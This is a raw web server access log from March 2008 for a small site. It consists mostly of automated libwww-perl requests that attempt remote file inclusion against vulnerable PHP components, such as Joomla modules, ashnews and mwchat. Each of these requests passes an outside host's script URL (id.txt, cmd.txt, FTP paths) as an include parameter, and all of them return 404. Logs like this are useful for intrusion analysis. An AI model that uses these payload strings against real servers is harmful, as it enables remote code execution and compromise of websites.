85.234.144.44 - - [23/Mar/2008:17:00:34 -0700] "GET /logs/access_080225.log//ashnews.php?pathtoashnews=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
85.234.144.44 - - [23/Mar/2008:17:00:34 -0700] "GET //ashnews.php?pathtoashnews=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
85.234.144.44 - - [23/Mar/2008:17:00:34 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
213.202.247.246 - - [23/Mar/2008:17:01:25 -0700] "GET /logs/access_080303.log/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
213.202.247.246 - - [23/Mar/2008:17:01:26 -0700] "GET /xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
213.202.247.246 - - [23/Mar/2008:17:01:26 -0700] "GET /logs/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
137.132.3.7 - - [23/Mar/2008:17:01:58 -0700] "GET /logs/index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
137.132.3.7 - - [23/Mar/2008:17:01:58 -0700] "GET /index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
85.25.137.24 - - [23/Mar/2008:17:04:02 -0700] "GET /logs/access_080303.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
85.25.137.24 - - [23/Mar/2008:17:04:02 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
85.25.137.24 - - [23/Mar/2008:17:04:02 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
85.25.137.24 - - [23/Mar/2008:17:04:59 -0700] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
213.193.230.201 - - [23/Mar/2008:17:08:46 -0700] "GET /logs/access_071126.log//appserv/main.php?appserv_root=http://mos1.altervista.org/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
213.193.230.201 - - [23/Mar/2008:17:08:46 -0700] "GET //appserv/main.php?appserv_root=http://mos1.altervista.org/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
213.193.230.201 - - [23/Mar/2008:17:08:46 -0700] "GET /logs//appserv/main.php?appserv_root=http://mos1.altervista.org/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
213.193.231.206 - - [23/Mar/2008:17:10:45 -0700] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
213.193.231.206 - - [23/Mar/2008:17:10:45 -0700] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://84.32.137.157/incoming/upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
213.193.231.206 - - [23/Mar/2008:17:10:45 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
213.193.231.206 - - [23/Mar/2008:17:10:45 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://84.32.137.157/incoming/upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
213.193.231.206 - - [23/Mar/2008:17:10:45 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
213.193.231.206 - - [23/Mar/2008:17:10:46 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://84.32.137.157/incoming/upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
67.195.44.110 - - [23/Mar/2008:17:11:14 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
67.195.44.92 - - [23/Mar/2008:17:11:16 -0700] "GET /logs/access_080114.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
200.35.95.235 - - [23/Mar/2008:17:11:45 -0700] "GET /logs/access_080121.log/index.php?option=com_forum&cpage=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.toulouseangloexchange.com"
128.241.54.180 - - [23/Mar/2008:17:11:51 -0700] "GET /logs/access.log/index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://www.1st-articles.com/articles/friulid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
128.241.54.180 - - [23/Mar/2008:17:11:51 -0700] "GET /index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://www.1st-articles.com/articles/friulid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
128.241.54.180 - - [23/Mar/2008:17:11:51 -0700] "GET /logs/index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://www.1st-articles.com/articles/friulid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
200.35.95.235 - - [23/Mar/2008:17:11:52 -0700] "GET /logs/access_080121.log/index.php?option=com_forum&cpage=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.toulouseangloexchange.com"
85.25.144.250 - - [23/Mar/2008:17:14:24 -0700] "GET /logs/access_080211.log//component/option,com_weblinks/Itemid,23//index2?mosConfig_absolute_path=http://www.nebatrade.com/mambots/search/foggian.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
85.25.144.250 - - [23/Mar/2008:17:14:24 -0700] "GET //component/option,com_weblinks/Itemid,23//index2?mosConfig_absolute_path=http://www.nebatrade.com/mambots/search/foggian.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
85.25.144.250 - - [23/Mar/2008:17:14:25 -0700] "GET /logs//component/option,com_weblinks/Itemid,23//index2?mosConfig_absolute_path=http://www.nebatrade.com/mambots/search/foggian.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
213.193.230.201 - - [23/Mar/2008:17:14:25 -0700] "GET /logs/access_080127.log//appserv/main.php?appserv_root=http://mos1.altervista.org/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
66.225.214.179 - - [23/Mar/2008:17:16:00 -0700] "GET /logs/access_080107.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://h4ck3d.wsnw.net/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.225.214.179 - - [23/Mar/2008:17:16:00 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://h4ck3d.wsnw.net/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.225.214.179 - - [23/Mar/2008:17:16:00 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://h4ck3d.wsnw.net/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.225.214.179 - - [23/Mar/2008:17:16:02 -0700] "GET /logs/access_080303.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://h4ck3d.wsnw.net/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
202.29.32.2 - - [23/Mar/2008:17:18:16 -0700] "GET /logs/access_080225.log/index.php?option=com_babackup&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
202.29.32.2 - - [23/Mar/2008:17:18:17 -0700] "GET /logs/index.php?option=com_babackup&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
202.29.32.2 - - [23/Mar/2008:17:20:18 -0700] "GET /logs/access.log/index.php?option=com_babackup&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
87.230.15.10 - - [23/Mar/2008:17:21:19 -0700] "GET /logs/access_071112.log//skin/zero_vote/error.php?dir=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
87.230.15.10 - - [23/Mar/2008:17:21:19 -0700] "GET //skin/zero_vote/error.php?dir=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
87.230.15.10 - - [23/Mar/2008:17:21:19 -0700] "GET /logs//skin/zero_vote/error.php?dir=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
212.79.233.58 - - [23/Mar/2008:17:23:47 -0700] "GET //ashnews.php?pathtoashnews=http://hearislam.com//photos/1/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.toulouseangloexchange.com"
212.79.233.58 - - [23/Mar/2008:17:24:06 -0700] "GET /logs/access_080225.log//ashnews.php?pathtoashnews=http://hearislam.com//photos/1/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.toulouseangloexchange.com"
212.79.233.58 - - [23/Mar/2008:17:24:06 -0700] "GET //ashnews.php?pathtoashnews=http://hearislam.com//photos/1/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.toulouseangloexchange.com"
212.79.233.58 - - [23/Mar/2008:17:24:06 -0700] "GET /logs//ashnews.php?pathtoashnews=http://hearislam.com//photos/1/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.toulouseangloexchange.com"
85.25.144.250 - - [23/Mar/2008:17:24:11 -0700] "GET /logs/access.log//component/option,com_weblinks/Itemid,23//index2?mosConfig_absolute_path=http://www.nebatrade.com/mambots/search/foggian.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
217.110.209.230 - - [23/Mar/2008:17:24:36 -0700] "GET /xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
87.230.15.10 - - [23/Mar/2008:17:24:51 -0700] "GET /logs/access_071203.log//skin/zero_vote/error.php?dir=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
85.25.144.250 - - [23/Mar/2008:17:25:03 -0700] "GET /logs/access_080303.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.nebatrade.com/mambots/search/foggian.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
66.29.10.40 - - [23/Mar/2008:17:25:03 -0700] "GET /logs/access_080225.log//ashnews.php?pathtoashnews=http://hearislam.com//photos/1/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
85.25.144.250 - - [23/Mar/2008:17:25:03 -0700] "GET //administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.nebatrade.com/mambots/search/foggian.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
66.29.10.40 - - [23/Mar/2008:17:25:03 -0700] "GET //ashnews.php?pathtoashnews=http://hearislam.com//photos/1/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
85.25.144.250 - - [23/Mar/2008:17:25:03 -0700] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.nebatrade.com/mambots/search/foggian.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
66.29.10.40 - - [23/Mar/2008:17:25:03 -0700] "GET /logs//ashnews.php?pathtoashnews=http://hearislam.com//photos/1/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
85.17.150.2 - - [23/Mar/2008:17:26:45 -0700] "GET /logs/access_080211.log/index.php?_REQUEST=&_REQUEST[option]=com_weblinks&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.visionnoir.com/newsreport/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
85.17.150.2 - - [23/Mar/2008:17:26:45 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_weblinks&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.visionnoir.com/newsreport/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
85.17.150.2 - - [23/Mar/2008:17:26:45 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_weblinks&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.visionnoir.com/newsreport/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
220.90.217.79 - - [23/Mar/2008:17:26:46 -0700] "GET //ashnews.php?pathtoashnews=http://hearislam.com//photos/1/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
85.25.137.24 - - [23/Mar/2008:17:27:32 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
85.25.137.24 - - [23/Mar/2008:17:27:32 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
85.25.137.24 - - [23/Mar/2008:17:27:32 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
217.110.209.230 - - [23/Mar/2008:17:28:48 -0700] "GET /logs/access_080204.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
219.166.61.155 - - [23/Mar/2008:17:28:51 -0700] "GET /logs/access_080224.log//becommunity/community/index.php?pageurl=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
219.166.61.155 - - [23/Mar/2008:17:28:52 -0700] "GET //becommunity/community/index.php?pageurl=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
219.166.61.155 - - [23/Mar/2008:17:28:52 -0700] "GET /logs//becommunity/community/index.php?pageurl=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
217.110.209.230 - - [23/Mar/2008:17:28:52 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
217.110.209.230 - - [23/Mar/2008:17:28:57 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
85.114.132.12 - - [23/Mar/2008:17:29:11 -0700] "GET /logs/access_080225.log//ashnews.php?pathtoashnews=http://hearislam.com//photos/1/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
85.114.132.12 - - [23/Mar/2008:17:29:11 -0700] "GET //ashnews.php?pathtoashnews=http://hearislam.com//photos/1/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
85.114.132.12 - - [23/Mar/2008:17:29:11 -0700] "GET /logs//ashnews.php?pathtoashnews=http://hearislam.com//photos/1/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
219.166.61.155 - - [23/Mar/2008:17:29:42 -0700] "GET /logs/access_071126.log//becommunity/community/index.php?pageurl=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
212.67.202.72 - - [23/Mar/2008:17:29:54 -0700] "GET /include/Classes.inc.php?tm_includepath=http://www.woodland.net/cal/backgrounds/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.toulouseangloexchange.com"
203.146.251.227 - - [23/Mar/2008:17:30:53 -0700] "GET /logs/access.log/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
74.53.240.146 - - [23/Mar/2008:17:30:55 -0700] "GET /logs/access.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
74.53.240.146 - - [23/Mar/2008:17:30:55 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
74.53.240.146 - - [23/Mar/2008:17:30:55 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
74.53.240.146 - - [23/Mar/2008:17:31:09 -0700] "GET /logs/access.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
74.53.240.146 - - [23/Mar/2008:17:31:09 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
74.53.240.146 - - [23/Mar/2008:17:31:10 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
217.110.209.230 - - [23/Mar/2008:17:31:20 -0700] "GET /logs/access_080211.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
69.64.76.150 - - [23/Mar/2008:17:31:23 -0700] "GET /logs/access.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
69.64.76.150 - - [23/Mar/2008:17:31:23 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
69.64.76.150 - - [23/Mar/2008:17:31:23 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
220.90.217.79 - - [23/Mar/2008:17:31:53 -0700] "GET /logs/access_080225.log//ashnews.php?pathtoashnews=http://hearislam.com//photos/1/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
220.90.217.79 - - [23/Mar/2008:17:31:53 -0700] "GET //ashnews.php?pathtoashnews=http://hearislam.com//photos/1/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
220.90.217.79 - - [23/Mar/2008:17:31:54 -0700] "GET /logs//ashnews.php?pathtoashnews=http://hearislam.com//photos/1/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
77.221.157.210 - - [23/Mar/2008:17:32:08 -0700] "GET /logs/access.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
77.221.157.210 - - [23/Mar/2008:17:32:08 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
77.221.157.210 - - [23/Mar/2008:17:32:08 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
77.221.157.210 - - [23/Mar/2008:17:32:10 -0700] "GET /logs/access.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
77.221.157.210 - - [23/Mar/2008:17:32:10 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
69.64.76.150 - - [23/Mar/2008:17:32:11 -0700] "GET /logs/access_071119.log//newspublish/include.php?path%5Bdocroot%5D=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
77.221.157.210 - - [23/Mar/2008:17:32:11 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
69.64.76.150 - - [23/Mar/2008:17:32:11 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
69.64.76.150 - - [23/Mar/2008:17:32:11 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
77.221.157.210 - - [23/Mar/2008:17:32:12 -0700] "GET /logs/access.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
77.221.157.210 - - [23/Mar/2008:17:32:12 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
77.221.157.210 - - [23/Mar/2008:17:32:12 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
69.64.76.150 - - [23/Mar/2008:17:32:18 -0700] "GET /logs/access_080128.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
69.64.76.150 - - [23/Mar/2008:17:32:18 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
69.64.76.150 - - [23/Mar/2008:17:32:19 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
82.147.142.67 - - [23/Mar/2008:17:32:21 -0700] "GET /logs/access_080225.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.topfood.be/awstats/js/jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
82.147.142.67 - - [23/Mar/2008:17:32:21 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.topfood.be/awstats/js/jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
82.147.142.67 - - [23/Mar/2008:17:32:21 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.topfood.be/awstats/js/jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.toulouseangloexchange.com"
74.53.240.146 - - [23/Mar/2008:17:32:23 -0700] "GET /logs/access_071119.log//newspublish/include.php?path%5Bdocroot%5D=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
74.53.240.146 - - [23/Mar/2008:17:32:23 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
74.53.240.146 - - [23/Mar/2008:17:32:23 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
74.53.240.146 - - [23/Mar/2008:17:32:29 -0700] "GET /logs/access.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
74.53.240.146 - - [23/Mar/2008:17:32:29 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
74.53.240.146 - - [23/Mar/2008:17:32:30 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
